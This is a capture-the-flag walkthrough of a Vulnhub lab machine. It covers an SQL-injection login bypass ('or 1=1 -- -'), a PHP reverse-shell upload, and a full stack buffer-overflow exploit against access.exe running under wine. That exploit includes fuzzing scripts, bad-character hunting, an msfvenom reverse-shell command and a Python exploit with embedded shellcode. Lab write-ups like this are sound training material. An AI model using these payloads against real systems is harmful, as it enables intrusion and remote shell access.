School 1 of vulnhub
2022-07-07 20:07:00 【Plum_ Flowers_ seven】
Catalog
One 、 Live host detection
Two 、 Service version scan
Three 、 Information gathering
Four 、 Back-end (admin panel) information collection
Five 、 File upload
Six 、 wine
Seven 、 Debugging the access.exe file
Eight 、 Privilege escalation succeeded
One 、 Live host detection
Two 、 Service version scan
Ports 22 and 80 are the usual services (SSH and HTTP). Port 23 is reported as tcpwrapped; port 23 is normally telnet.
What tcpwrapped means (looked up on Baidu, with the usual misreading corrected):
When nmap labels a port tcpwrapped, the TCP three-way handshake completed but the remote side closed the connection without sending any data. That is the behaviour of a service built with TCP Wrappers (libwrap), an application-level access-control layer that checks SSH, telnet, FTP and similar requests against /etc/hosts.allow and /etc/hosts.deny, hands the connection to the real service if the client is allowed and drops it otherwise. It is only an inference, though: any daemon that accepts a connection and closes it without a banner produces the same label, so "tcpwrapped" does not prove TCP Wrappers is installed. On this box port 23 turns out to be the access.exe program run under wine, which is what section Seven debugs.
Three 、 Information gathering
For a login box there are two approaches:
1. Obtain a valid account and password (brute force, credentials leaked in the source code, weak-password guessing).
2. Try SQL injection.
An always-true condition makes the injection succeed.
The trailing `-` after `-- ` is actually not needed; what matters is the space after `--`, because MySQL only treats `--` as a comment when it is followed by whitespace. The comment swallows the rest of the original statement, including the password comparison that was spliced onto the end of the query, which is why the login is bypassed:
ss ' or 1=1 -- -
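As an added illustration (not code from the original write-up), the following Python reproduces the bypass against a constructed SQLite table, putting the string-concatenated query the login box presumably runs next to its parameterised fix. The table, the credentials and the column names are assumptions; the target's real schema is not shown on this page. One difference from MySQL: SQLite treats `--` as a comment even without a trailing space, so the whitespace requirement discussed above does not show up here.

```python
import sqlite3


# Constructed stand-in for the site's user table; the real schema is not
# shown on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return conn


def rendered_query(username, password):
    """The statement a string-concatenating login box builds. With the
    username  ss ' or 1=1 -- -  the quote closes the literal, OR 1=1 makes
    the WHERE clause true for every row and -- comments out the password
    comparison that was spliced onto the end."""
    return ("SELECT username FROM users WHERE username = '%s' "
            "AND password = '%s'" % (username, password))


def vulnerable_login(conn, username, password):
    """Login accepted if at least one row comes back (the injectable path)."""
    row = conn.execute(rendered_query(username, password)).fetchone()
    return row is not None


def safe_login(conn, username, password):
    """Same check with bound parameters: the input is data, never SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    inj = "ss ' or 1=1 -- -"
    print(rendered_query(inj, "x"))
    print("vulnerable:", vulnerable_login(db, inj, "x"))   # True
    print("parameterised:", safe_login(db, inj, "x"))      # False
```

Running it prints the rendered statement, which makes the point visible: everything after `--` is dead text, so the password the attacker typed never reaches the database.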
Four 、 Back-end (admin panel) information collection
1. Reflected XSS
These pages all have XSS, but it does not help us get a foothold here (the same was true of the previous box).
2. Source code
Pay particular attention to the JavaScript and to the comments. Here they reveal a hidden path and the folder in which uploaded files are saved.
Five 、 File upload
Under the hidden directory there is a file upload function.
1. Upload a PHP reverse-shell file.
2. Requesting the uploaded file from the save folder found in the source code executes it and the reverse shell connects back (have the listener running first).
Six 、 wine
wine, put simply, lets you run Windows programs on Linux.
Contents of the win directory:
It contains an access.exe file.
Copy it to a Windows machine and debug it there to see whether it has a vulnerability.
Seven 、 Debugging the access.exe file
1. Debugger: Immunity Debugger
Download it from the official site.
2. Download the mona script
It is on GitHub; download mona.py and drop it into Immunity Debugger's PyCommands folder.
3. Start the process
Open access.exe in Immunity Debugger and run it so that it listens on port 23. This is the service that showed up as tcpwrapped and that the fuzzing below targets.
4. Write a Python script
The point is to check whether the program has a buffer overflow and, if it does, where the overflow happens. The first script simply sends 2000 bytes of 'A':
#!/usr/bin/python2
import sys, socket

# 2000 bytes of 'A' (0x41): if the service crashes with EIP = 41414141,
# the saved return address on the stack is under our control.
payload = 'A' * 2000
try:
    s = socket.socket()
    s.connect(('192.168.0.', 23))   # host running access.exe
    s.send(payload)
    s.close()
except:
    print('wrong')
    sys.exit()
5. The program crashes
The crash confirms the buffer overflow: if EIP reads 41414141 ('AAAA') in the debugger, the saved return address has been overwritten by our data.
6. Generate 2000 unique bytes with msf-pattern_create
msf-pattern_create -l 2000
7. Find the offset
Send the pattern instead of the A's, note the value in EIP when the program crashes, and look it up with msf-pattern_offset -l 2000 -q <EIP value>. For access.exe the offset is 1902, which is why the exploit below pads with 1902 bytes before the return address.
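Added example, not code from the original write-up: a Python re-implementation of msf-pattern_create and msf-pattern_offset, so the offset can be recovered offline from the EIP value in the crash. The page does not show the EIP value it observed; the value 0x43346c43 used below is derived from the pattern itself as the dword that sits at offset 1902, the offset the exploit in step 11 uses.

```python
import string
import struct

# Re-implementation of msf-pattern_create / msf-pattern_offset so the offset
# can be recovered offline from the EIP value the debugger shows.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Metasploit's cyclic pattern: Aa0Aa1Aa2 ... Aa9Ab0 ... Az9Ba0 ...
    The digit turns over fastest, then the lowercase letter, then the
    uppercase one, so every 4-byte window is unique within the first
    26*26*10*3 = 20280 bytes; the pattern repeats after that."""
    base = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGITS)
    return (base * (length // len(base) + 1))[:length]


def pattern_offset(value, length=2000):
    """Offset of the four bytes that overwrote EIP.

    `value` may be the register as an int (0x43346c43, little-endian as
    the debugger shows it), the same as an 8-digit hex string ("43346c43",
    what msf-pattern_offset -q takes), or the four characters themselves
    ("Cl4C"). Returns None if the dword is not in the pattern, which
    usually means EIP was not overwritten by the pattern at all."""
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    elif len(value) == 8 and all(c in string.hexdigits for c in value):
        needle = struct.pack("<I", int(value, 16)).decode("latin-1")
    else:
        needle = value
    pos = pattern_create(length).find(needle)
    return pos if pos >= 0 else None


if __name__ == "__main__":
    pat = pattern_create(2000)
    print(pat[:30])
    # The dword at offset 1902 (the offset used in the exploit below), as
    # EIP would display it after being overwritten by this pattern. This
    # value is computed here, not taken from a crash on the page.
    eip = struct.unpack("<I", pat[1902:1906].encode("latin-1"))[0]
    print("EIP = 0x%08x -> offset %d" % (eip, pattern_offset(eip)))
```

Because the dword is read back little-endian, EIP = 0x43346c43 corresponds to the characters "Cl4C" in the pattern; feeding either form to pattern_offset gives 1902. If the lookup returns None, the crash did not land in the pattern (for example the input was truncated before reaching the return address) and the offset search has to be redone with a different buffer size.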
8. EIP -> ESP
At the moment of the crash ESP points into our buffer, so the attack payload goes there and EIP has to be redirected to it: overwrite EIP with the address of a JMP ESP instruction (opcode FF E4) inside a module loaded at a fixed address.
(1) List the modules with mona and pick one whose Rebase, SafeSEH, ASLR and NXCompat columns are all False:
!mona modules
(2) Search that module for JMP ESP:
!mona find -s "\xff\xe4" -m "funcs_access.dll"
Address=625012D0
Note that this recorded address does not match the bytes used in the exploit below (\xdd\x12\x50\x62, i.e. 0x625012DD); use the address mona actually printed, written little-endian, and check that none of its four bytes is a bad character.
9. Detect bad characters
Bad characters are bytes the program alters or truncates on the way to the stack (0x00 almost always, 0x0a for line-based input), and any one of them breaks the shellcode. They are found empirically: send every byte value 0x01-0xff after the return address, compare the memory at ESP with what was sent (!mona bytearray and !mona compare do exactly this), drop the first corrupted byte, and repeat until the buffer survives intact. The ones found here:
\x00\x0a\x4d\x4f\x5f\x79\x7e\x7f
10. Generate shellcode
msfvenom encodes the shellcode so that none of the excluded bytes appear in it; EXITFUNC=thread makes the shell terminate its own thread instead of the whole process when it exits. The -b list below omits \x0a, which step 9 found to be bad; every bad byte should be excluded, otherwise the encoder may emit a byte the program corrupts.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.109 LPORT=4444 -b '\x00\x4d\x4f\x5f\x79\x7e\x7f' -f c EXITFUNC=thread
11. Python exploit
#! /usr/bin/python2
import sys
import socket

try:
    # msfvenom output from step 10 (windows/shell_reverse_tcp, bad characters encoded out)
    shellcode = ("\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
                 "\xce\x93\x58\xfd\x83\xee\xfc\xe2\xf4\x32\x7b\xda\xfd\xce\x93"
                 "\x38\x74\x2b\xa2\x98\x99\x45\xc3\x68\x76\x9c\x9f\xd3\xaf\xda"
                 "\x18\x2a\xd5\xc1\x24\x12\xdb\xff\x6c\xf4\xc1\xaf\xef\x5a\xd1"
                 "\xee\x52\x97\xf0\xcf\x54\xba\x0f\x9c\xc4\xd3\xaf\xde\x18\x12"
                 "\xc1\x45\xdf\x49\x85\x2d\xdb\x59\x2c\x9f\x18\x01\xdd\xcf\x40"
                 "\xd3\xb4\xd6\x70\x62\xb4\x45\xa7\xd3\xfc\x18\xa2\xa7\x51\x0f"
                 "\x5c\x55\xfc\x09\xab\xb8\x88\x38\x90\x25\x05\xf5\xee\x7c\x88"
                 "\x2a\xcb\xd3\xa5\xea\x92\x8b\x9b\x45\x9f\x13\x76\x96\x8f\x59"
                 "\x2e\x45\x97\xd3\xfc\x1e\x1a\x1c\xd9\xea\xc8\x03\x9c\x97\xc9"
                 "\x09\x02\x2e\xcc\x07\xa7\x45\x81\xb3\x70\x93\xfb\x6b\xcf\xce"
                 "\x93\x30\x8a\xbd\xa1\x07\xa9\xa6\xdf\x2f\xdb\xc9\x6c\x8d\x45"
                 "\x5e\x92\x58\xfd\xe7\x57\x0c\xad\xa6\xba\xd8\x96\xce\x6c\x8d"
                 "\xad\x9e\xc3\x08\xbd\x9e\xd3\x08\x95\x24\x9c\x87\x1d\x31\x46"
                 "\xcf\x97\xcb\xfb\x98\x55\xce\xff\x30\xff\xce\x82\x04\x74\x28"
                 "\xf9\x48\xab\x99\xfb\xc1\x58\xba\xf2\xa7\x28\x4b\x53\x2c\xf1"
                 "\x31\xdd\x50\x88\x22\xfb\xa8\x48\x6c\xc5\xa7\x28\xa6\xf0\x35"
                 "\x99\xce\x1a\xbb\xaa\x99\xc4\x69\x0b\xa4\x81\x01\xab\x2c\x6e"
                 "\x3e\x3a\x8a\xb7\x64\xfc\xcf\x1e\x1c\xd9\xde\x55\x58\xb9\x9a"
                 "\xc3\x0e\xab\x98\xd5\x0e\xb3\x98\xc5\x0b\xab\xa6\xea\x94\xc2"
                 "\x48\x6c\x8d\x74\x2e\xdd\x0e\xbb\x31\xa3\x30\xf5\x49\x8e\x38"
                 "\x02\x1b\x28\xb8\xe0\xe4\x99\x30\x5b\x5b\x2e\xc5\x02\x1b\xaf"
                 "\x5e\x81\xc4\x13\xa3\x1d\xbb\x96\xe3\xba\xdd\xe1\x37\x97\xce"
                 "\xc0\xa7\x28")
    # 1902 bytes of padding up to the saved return address, then the JMP ESP
    # address (0x625012dd written little-endian), a 32-byte NOP sled so the
    # decoder stub has room to work, then the shellcode that ESP now points at.
    payload = "A" * 1902 + "\xdd\x12\x50\x62" + "\x90" * 32 + shellcode
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.0.109", 23))   # host running access.exe
    s.send(payload)
    s.close()
    print('done')
except:
    print('error')
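Added example (not the page's code): the bad-character hunt from step 9 and the payload layout from step 11 as one small Python module. The target service is replaced by a constructed stand-in that truncates at 0x0a and mangles the other bytes the page lists, so the loop can run offline; the "drop the first corrupted byte and resend" cycle is exactly what one does with !mona bytearray and !mona compare against the real program. build_payload refuses to assemble a payload whose return address or shellcode contains a bad byte, a check worth having since the msfvenom command above excluded one byte fewer than step 9 found. The offset 1902, the address 0x625012dd and the bad-character list are the page's; the fake service's behaviour is an assumption.

```python
import struct

# Bad characters step 9 found for access.exe.
PAGE_BADCHARS = b"\x00\x0a\x4d\x4f\x5f\x79\x7e\x7f"


def badchar_buffer(exclude=b"\x00"):
    """All byte values 0x00-0xff minus the ones already known to be bad;
    the same buffer !mona bytearray -b "..." writes out. It goes right
    after the return address so that it is what ESP points at."""
    return bytes(b for b in range(256) if b not in exclude)


def first_corruption(sent, dumped):
    """Compare what was sent with the bytes read back from the stack at ESP.
    Returns the first byte value that did not survive, or None if the whole
    buffer is intact. A dump shorter than the buffer means the byte at the
    cut was bad (typically 0x00 or 0x0a, which end string/line handling)."""
    for i in range(min(len(sent), len(dumped))):
        if sent[i] != dumped[i]:
            return sent[i]
    if len(dumped) < len(sent):
        return sent[len(dumped)]
    return None


def hunt_badchars(probe):
    """Iterative bad-character hunt: send, compare, drop the first corrupted
    byte, resend, until the buffer comes back unchanged. `probe(buf)` stands
    in for "send buf to the service and read the memory at ESP"."""
    bad = bytearray(b"\x00")   # NUL is excluded from the first round
    while True:
        buf = badchar_buffer(bytes(bad))
        culprit = first_corruption(buf, probe(buf))
        if culprit is None:
            return bytes(bad)
        bad.append(culprit)


def fake_access_exe(buf):
    """Constructed stand-in for the real service (an assumption, not the
    page's observed behaviour): input is cut at the first 0x0a and the other
    bytes in PAGE_BADCHARS are mangled before they reach the stack."""
    kept = bytearray()
    for b in buf:
        if b == 0x0a:
            break
        kept.append(b ^ 0x20 if b in PAGE_BADCHARS else b)
    return bytes(kept)


def badchars_in(blob, badchars=PAGE_BADCHARS):
    """Bad byte values present in an address or shellcode blob, sorted."""
    return sorted(set(blob) & set(badchars))


def build_payload(offset, jmp_esp, shellcode, nops=32, badchars=PAGE_BADCHARS):
    """The layout used by the exploit above: padding up to the saved return
    address, the JMP ESP address little-endian, a NOP sled, the shellcode.
    Refuses to build if the address or the shellcode would be corrupted."""
    ret = struct.pack("<I", jmp_esp)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        found = badchars_in(blob, badchars)
        if found:
            raise ValueError("%s contains bad bytes %s"
                             % (name, ", ".join("%#04x" % b for b in found)))
    return b"A" * offset + ret + b"\x90" * nops + shellcode


if __name__ == "__main__":
    print("bad chars:", hunt_badchars(fake_access_exe).hex())
    demo = build_payload(1902, 0x625012dd, b"\xcc" * 8)
    print("payload length", len(demo), "EIP bytes", demo[1902:1906].hex())
```

Against the real program, probe would send the buffer over the socket and return what the debugger shows at ESP; the rest of the loop is unchanged. Both candidate addresses from step 8 (0x625012D0 and 0x625012DD) pass the bad-byte check, so the check does not settle which one mona printed, only that neither would be corrupted in transit.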
Eight 、 Privilege escalation succeeded
Here Z:/ is the drive wine maps to the Linux root directory, so the shell from access.exe sees the whole filesystem. The second flag could not be read from the low-privileged shell obtained earlier;
being able to read it from here proves the escalation worked.